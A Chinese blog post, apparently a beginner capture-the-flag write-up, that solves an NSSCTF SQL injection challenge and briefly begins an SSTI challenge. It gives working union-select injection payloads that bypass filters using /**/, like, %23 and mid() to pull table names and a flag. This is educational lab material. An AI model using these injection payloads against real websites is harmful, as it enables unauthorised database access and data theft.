nssctf web 入门(9)

最新推荐文章于 2024-09-22 15:35:08 发布
最新推荐文章于 2024-09-22 15:35:08 发布
阅读量310 收藏
点赞数
分类专栏: nssctf web入门 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/130217212
版权

[SWPUCTF 2021 新生赛]sql

[SWPUCTF 2021 新生赛]sql

 

 

 可以猜测做了过滤

这里可以bp跑一下看过滤了哪些

尝试发现过滤了空格/**/在sql中代表注释符在mysql中这个可以用来代表空格

 

发现--+被过滤

 #也不行我们试下url编码的#也就是%23

 成功了

 3个字段

得到库名test_db

 这里提示非法操作经过尝试发现=被过滤

在sql中like用于判断一个字符串是否匹配某个模式

这里要在3的字段不然会报错

 ?wllm='union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()/**/%23

这里和之前的sql一样就不详细解释了如果不知道可以去看第8篇里面详细讲了

这里就把空格换成了/**/和把=换成了like

?wllm='union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'/**/%23

在查询flag

还是有显示问题这里也过滤了right

right是知道字符,然后从指定的位置开始输出

sql中md用于从字符串中提取指定长度的字符串

MID(str, start, length) 

str 是要提取子字符串的字符串

start是要开始提取的位置,从 1 开始计数。

length 是要提取的子字符串的长度。

我们使用mid(flag,20,30)代表提取flag字符串从20开始提取30个

 不够继续

 ?wllm='union/**/select/**/1,2,mid(flag,30,30)/**/from/**/LTLT
_flag%23

提取好了拼接一下

[CISCN 2019华东南]Web11

[CISCN 2019华东南]Web11

 因为页面中有X-Forwarded-For所以尝试一下添加X-Forwarded-For发现可以修改X-Forwarded-For在ctf中的应用不多这里不像是修改X-Forwarded-For修改报头的题我们尝试一下ssti

 通过{1*1}得到1发现存在SSTI

在存在模板注入的地方执行系统命令

 

 

 

 

许允er
关注
专栏目录
NSSCTF (3)
qq_61988806的博客
05-11 599
我们打开js源码很明显这里当score大于60会出flag我们寻找到了getScore方法所在的地方之后发现他存在于Snake.prototype中再控制台中给getScore赋值再空格页面。
NSSCTF 2nd WEB
ytl_storm的博客
09-25 389
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法中接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
NSSCTF
weixin_43896504的博客
07-22 2820
NSSCTF
NSSCTF刷题篇1
weixin_74427106的博客
09-22 894
这是一道js信息泄露的题目直接查看源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码注意要将数字之间的空格去掉。
nssctfWeb刷题)
2302_80935968的博客
05-23 1092
字符串和数字比较使用==时,字符串会先转换为数字类型再比较,若字符串以数字开头,则取开头数字作为转换结果,不能转换为数字的字符串(例如"aaa"是不能转换为数字的字符串,而"123"或"123aa"就是可以转换为数字的字符串)或null,则转换为0。在上面的示例中,name、age、isStudent、address、phoneNumber都是键,对应的值分别是字符串、数字、布尔值、嵌套的JSON对象、null。在php中,0e开头的数字会当作科学计数法解析,不管后面的值为任何东西,0的任何次幂都为0。
NSSCTF做题
wwwwyyyrre的博客
09-24 693
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这篇博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
NSSCTF刷题
m0_63711447的博客
03-19 479
preg_match() 函数:用于进行正则表达式匹配,成功返回 1 ,否则返回 0intval ():获取变量的整数值isset()函数:在php中用来判断变量是否声明,该函数返回布尔类型的值,即true/false。isset只能用于变量,传递任何其它参数都将造成解析错误。is_string():用于检测变量是否是字符串看代码发现有三个if条件需要绕过第一个:用post对a进行传参,参数不能包含0-9的数字且要是整型绕过preg_match()函数可以用数组绕过显示go on,成功绕过。
NSSCTF刷题wp——Crypto入门
YougerXen的博客
04-10 2141
NSSCCTF Crypto 探索 Crypto入门 [鹤城杯 2021]easy_crypto ID:453 公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐 社会主义核心价值观密码,直接解,在线工具 解出后得fl
NSSCTF-极客大挑战2020-web-wp
F1rstb100d
09-21 705
NSSCTF-极客大挑战2020-web-wp
NSSCTF-第五空间2021-wp
F1rstb100d
09-24 1245
NSSCTF-第五空间2021-wp
NSSCTF】刷题记录——[SWPUCTF 2021 新生赛]系列(WEB篇)
jameshuangchuan的博客
08-08 3175
此处主要在NSSCTF平台()上开展刷题。
NSSCTF做题(5)
wwwwyyyrre的博客
09-30 8154
注意 PHP>=5.3.0压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。然后,将文件的内容作为响应返回。其中a,b1,b2都可以用数组绕过,因为a是正则绕过,b是MD5绕过,接下来看c c强调了要传入c1不等于c2 c1,c2都要是字符串,c1c2的MD5值要相等 所以c就不能用数组绕过,可以用科学计数法0e绕过。它检查请求中是否包含文件,将文件保存到目录中,使用 生成唯一 ID,将 ID 和文件路径插入到数据库中的表中,最后将用户重定向到路由。
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1233
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
nssctf web入门(4)
qq_61988806的博客
04-16 758
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
nssctf web 入门(6)
qq_61988806的博客
04-17 1314
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
NSSCTF web学习
akxnxbshai的博客
09-30 1289
NSSCTF web刷题
nssctf web入门(2)
qq_61988806的博客
04-13 1015
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
nssctf pwn
最新发布
10-24
NSSCTF (National Security Service CTF) 是一种网络安全比赛,其中pwn (Payload Writing and Exploitation) 题目通常涉及漏洞利用和内存安全相关的挑战。在这样的竞赛中,参赛者需要找到程序中存在的安全漏洞,如缓冲区溢出、格式化字符串漏洞等,并编写exploit(exploitation的简称),即一段恶意代码,来控制程序流程,获取flag(通常是一种竞赛得分的关键标识符)。 Pwn题目通常包括以下几个步骤: 1. **分析**:研究提供的二进制文件或源码,确定可能存在哪些类型的漏洞。 2. **栈溢出**:如果存在堆栈溢出,尝试构造payload,使其覆盖返回地址并指向自身或有用的地址。 3. **RCE(Remote Code Execution)**:通过修改程序的行为执行任意代码,可能需要理解如何设置环境变量或系统调用来达到目的。 4. **权限提升**:一旦获得某种程度的控制权,可能会尝试寻找路径提升权限到root或其他有更高权限的用户。 5. **获取flag**:执行特定操作或触发特定条件后,通常会在某个内存位置发现flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值